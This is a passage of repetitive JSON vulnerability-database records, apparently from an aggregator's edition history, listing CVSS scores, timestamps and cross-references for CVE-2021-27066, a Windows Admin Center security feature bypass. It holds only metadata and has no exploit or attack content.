"impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-04T06:46:24", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-04T06:46:24", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-04T06:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:46:24", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-04T08:46:04", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-04T08:46:04", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-04T08:46:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:46:04", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-04T14:44:27", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-04T14:44:27", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-04T14:44:27", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:44:27", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-04T16:50:09", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-04T16:50:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-04T16:50:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:50:09", "differentElements": ["description"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-05T04:53:07", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-05T04:53:07", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-05T04:53:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T04:53:07", "differentElements": ["description", "msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-05T06:45:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-05T06:45:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-05T06:45:38", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:45:38", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-05T08:47:22", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-05T08:47:22", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-05T08:47:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:47:22", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-05T18:43:18", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-05T18:43:18", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-05T18:43:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:43:18", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-05T20:47:39", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-05T20:47:39", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-05T20:47:39", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:47:39", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-06T10:42:25", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-06T10:42:25", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-06T10:42:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:42:25", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-06T12:47:54", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-06T12:47:54", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-06T12:47:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:47:54", "differentElements": ["description", "msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "8344f2389b781f7e0a47d07f4dcbdd12", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-06T16:52:07", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-06T16:52:07", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-06T16:52:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:52:07", "differentElements": ["description", "msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, 